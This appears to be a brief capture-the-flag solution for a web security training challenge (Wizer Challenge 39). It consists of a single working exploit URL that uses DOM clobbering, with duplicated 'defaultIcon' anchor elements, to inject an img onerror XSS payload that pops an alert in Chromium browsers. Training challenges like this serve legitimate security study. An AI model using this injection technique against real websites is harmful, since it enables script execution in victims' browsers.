Wizer - Challenge 39 - DOM Clobbering XSS

Exploit

(This exploit only works on Chromium based browsers.)

https://chal39-rfh85-a4e8a8b41487.herokuapp.com/?username=<a id=defaultIcon><a id=defaultIcon name="emoji" href='cid:<img src=x onerror=alert("HACKED")>//'>&messages=test,test2